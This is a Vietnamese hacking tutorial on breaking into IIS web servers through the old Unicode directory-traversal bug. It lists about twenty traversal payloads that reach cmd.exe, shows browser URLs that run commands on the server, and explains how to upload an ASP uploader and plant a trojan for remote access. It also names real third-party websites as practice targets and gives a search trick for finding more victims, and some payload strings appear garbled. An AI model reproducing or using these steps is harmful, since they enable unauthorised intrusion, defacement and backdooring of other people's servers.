Giới thiệu :
• Các bạn thường hỏi : Làm thế nào các Hacker , hack được một website ??
• Tôi sẽ trình bày với các bạn cách hack một website trên IIS server. Hiện nay có rất nhiều cách hack IIS server nhưng tôi sẽ giới thiệu cho các bạn cách đơn giản nhất !
Hack IIS server bằng UNICODE bug :
• Theo thống kê của Microsoft thì có khoảng 13 triệu website trên NET hiện nay dùng IIS server cũng như các sản phẩm của MS thì version 5 và 6 của IIS server có một lỗi rất nghiêm trong là lỗi UNICODE (Unicode bug). Dĩ nhiên là MS đã đưa ra bản patch sửa lỗi nhưng trong số hơn 13 triệu website tất cả đã được patch
• Bắt đầu tiến hành :
1. Xác đinh website có dùng IIS hay không : có nhiều cách để xác đinh bằng cách dùng các tool hacker , nhưng ở đây chúng ta chỉ cần dùng telnet, ở cửa sổ Run của Windows bạn đánh : telnet . Rồi chọn
Host: diachitrangweb.com | Port: 80 | Term type: vt100
Lúc đó sẽ hiện lên thông báo về server của website và bạn sẽ biết nó có dùng IIS server không ?
2. Ðồ nghể để hack : Bạn phải cài Perl trên máy (giới thiệu : dùng Active Perl 552 (~5M) đownload ở
http://www.softseek.com/ ) và file unicode (download ở đây : unicode.pl )
3. Sau khi đã cài đặt xong Perl , ở của sổ MS-DOS promt bạn gõ :
perl unicode.pl
www.diachiwebsite.com:80Chờ một chút nó sẽ tìm các bug trên IIS, có 20 bug UNICODE của IIS:
[1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
[2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+
[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+
[4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+
[6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+
[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+
[11]/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+
[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
[13] /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+
[14] /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/c+
[15] /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[16] /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[17] /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[18] /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[19] /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[20] /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
4. Ví dụ nó scan ra được bug 15 thì ở URL của Browser bạn gõ :
http://www.diachitrangweb.com/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+ Hè hè !! bây giờ tôi đã vào được server của nó rồi !! muốn làm gì thì làm !! bằng các lênh DOS cổ lỗ sĩ thông thường
Ví dụ : để dir ổ C của server bạn đánh như sau ở Browser :
http://www.diachitrangweb.com/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\Cũng thế bạn có thể mở thư muc MD, đổi tên thư mục RD, xem file, xoá file ...... như DOS
)
5. Bây giờ quan trọng là phải đưa trang Web của mình vào đó, bạn CD vào thư mục: c:\inetpub\wwwroot
bạn cần 3 file : cgidecoderloader.pl, upload.asp, upload.in (ở cùng một thư mục trên ổ cứng - đownload ở đây - upload.zip)
cỏ của sổ MS-DOS promt bạn gõ :
perl cgidecoderloader target:80 'f:\inetpub\wwwroot'
Sau khi qua' trình hoàn thành, ở browser bạn đánh :
http://www.diachitrangweb.com/upload.asp rồi upload thứ gì ban muốn (Lời khuyên : upload 1 trojan backorffice để mở port để sau này ban có thể Remote Access đươc.
6. Giới thiệu mọtt só website để bạn thực tập (không phải website ViêtNam) :
http://www.iwss.net/ http://www.colorworksinc.com/ http://www.ewatchanddiamond.com/ http://www.sintaks.com/ http://www.electroid.com/ http://www.aspcart.com/ http://www.cfaluminum.com/ http://www.thecapitalgroup.cc/ http://www.kristan-sp.si/ http://www.parrotnetwork.com/ http://www.enjoyusa.com/ http://www.activewebsystems.co.uk/ http://www.safeteefirst.com/ http://www.xtendafork.com/ http://vault.kupinet.com/ http://home.socal.rr.com/ .............
o Bonus track : Vấn đề khó khăn cho các bạn là làm thế nào để tìm được website để hack , đay là một thủ thuât dơn giản : ban vào trang
http://www.av.com/ rồi search với thuât ngữ sau : "powered by IIS"
Lúc đó sẽ có vô số trang web cho bạn hack mệt nghỉ, chán thì thôi
)